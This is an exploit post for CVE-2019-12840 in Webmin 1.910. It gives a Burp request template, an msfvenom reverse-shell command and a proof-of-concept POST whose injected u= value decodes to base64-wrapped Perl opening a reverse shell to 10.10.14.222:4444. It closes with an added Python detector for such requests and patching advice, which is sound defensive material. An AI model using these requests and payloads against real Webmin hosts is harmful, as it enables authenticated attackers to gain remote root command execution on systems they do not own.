# Exploit Title: Webmin 1.910 - Remote Code Execution abusing Package Updates using BurpSuite
# Date: 11/13/19
# Exploit Author: BoxBois
# Version: Webmin 1.910
# Tested on: Linux
# CVE : 2019-12840
Exploit for the Webmin 1.910 Remote Command Execution vulnerability (CVE-2019-12840). If you have permission to log in and update packages, you can remotely execute code as the Webmin user (usually run as root).
Use Burp to make a POST request to the page and paste the request below into the Raw tab. Replace the cookie's sid with your own sid, RHOST and RPORT with the target IP and port, and PAYLOAD with your msfvenom-generated payload. Have an nc listener running and enjoy your shell.
Basic msfvenom reverse Perl payload creation command: "msfvenom -p cmd/unix/reverse_perl LHOST=IP LPORT=PORT -f raw > shell.pl"
-------------------------------------------------
POST /package-updates/update.cgi HTTP/1.1
Host: [RHOST]:[RPORT]
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: sid=[INPUT GOOD SID HERE]
Referer: [RHOST]:[RPORT]/package-updates/?xnavigation=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 432
Connection: close
u=acl%2Fapt&u=[PAYLOAD HERE]
--------------------------------------------------------
Proof of concept
POST /package-updates/update.cgi HTTP/1.1
Host: 10.10.10.xxx:10000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Cookie: sid=c6a571fc026f5565b3ea489081383bed
Referer: 10.10.10.xxx:10000/package-updates/?xnavigation=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 432
Connection: close
u=acl%2Fapt&u=%20%7C%20bash%20-c%20%22%7becho%2ccGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxMC4xMC4xNC4yMjI6NDQ0NCIpO1NURElOLT5mZG9wZW4oJGMscik7JH4tPmZkb3BlbigkYyx3KTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTsn%7d%7c%7bbase64%2c-d%7d%7c%7bbash%2c-i%7d%22
--------------------------------------------------------
POC Payload Info
URL decoded:
| bash -c "{echo,cGVybCAtTUlPIC1lICckcD1mb3JrO2V4aXQsaWYoJHApO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxMC4xMC4xNC4yMjI6NDQ0NCIpO1NURElOLT5mZG9wZW4oJGMscik7JH4tPmZkb3BlbigkYyx3KTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTsn}|{base64,-d}|{bash,-i}"
base64 decoded:
perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"10.10.14.222:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
All together, decoded:
| bash -c "{echo,perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"10.10.14.222:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'}|{base64,-d}|{bash,-i}"
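From the defender's side, the distinguishing feature of this request is that the second u= value is not a package name at all: once URL-decoded it starts with a pipe and shell metacharacters, which update.cgi in 1.910 passes through to the package manager. The following is an added detection example, not part of the original exploit post: it parses the form body of POSTs to /package-updates/update.cgi, URL-decodes every u value, and flags values that do not match the shape of a legitimate package or module name. The request tuples, the package-name pattern and the log shape are constructed assumptions for illustration.

```python
"""Flag command-injection attempts against Webmin's package-updates
update.cgi by checking each ``u`` form value against the shape of a
legitimate package/module name.

Added defensive example (not from the original post). The request
tuples and the package-name pattern below are constructed assumptions.
"""
import re
from urllib.parse import parse_qs

# Characters a package name handed to apt/yum should never contain.
SHELL_META = re.compile(r"""[|;&`$(){}<>"'\s]""")
# Assumed shape of a legitimate value, e.g. "acl/apt" or "openssl":
# letters, digits and . + _ : / ~ - only, starting with a letter or digit.
PACKAGE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.+_:/~-]*$")
TARGET_PATH = "/package-updates/update.cgi"

# Constructed sample traffic as (method, path, body). The third request
# carries a URL-encoded " | id" in its second u= value.
SAMPLE_REQUESTS = [
    ("GET", "/package-updates/?xnavigation=1", ""),
    ("POST", TARGET_PATH, "u=acl%2Fapt&u=openssl"),
    ("POST", TARGET_PATH, "u=acl%2Fapt&u=%20%7C%20id"),
    ("POST", "/proc/index.cgi", "u=%20%7C%20id"),  # other module, ignored
]


def suspicious_values(body: str) -> list:
    """Return (decoded_value, sorted_metachars) for every u= value in a
    form body that does not look like a package name."""
    findings = []
    # parse_qs percent-decodes the values and keeps repeated u= keys.
    for value in parse_qs(body, keep_blank_values=True).get("u", []):
        if PACKAGE_NAME.match(value):
            continue
        meta = sorted(set(SHELL_META.findall(value)))
        findings.append((value, meta))
    return findings


def scan_requests(requests) -> list:
    """Alert on POSTs to update.cgi whose u= values fail the package-name
    check. Other paths and methods are out of scope for this rule."""
    alerts = []
    for method, path, body in requests:
        if method != "POST" or path.split("?")[0] != TARGET_PATH:
            continue
        for value, meta in suspicious_values(body):
            alerts.append({
                "path": path,
                "value": value[:80],      # truncate long payloads in alerts
                "metachars": meta,
            })
    return alerts


if __name__ == "__main__":
    for alert in scan_requests(SAMPLE_REQUESTS):
        print("ALERT", alert)
```

The allowlist check is deliberately stricter than a metacharacter blocklist: anything outside the package-name alphabet is reported, and the metacharacters found are attached for triage. The same rule applies to the PoC body above, whose decoded second value begins with " | bash -c". Hosts running 1.910 should be upgraded to a patched release, and the package-updates module should only be granted to Webmin accounts that need it, since the vulnerability is reachable only by an authenticated user with that permission.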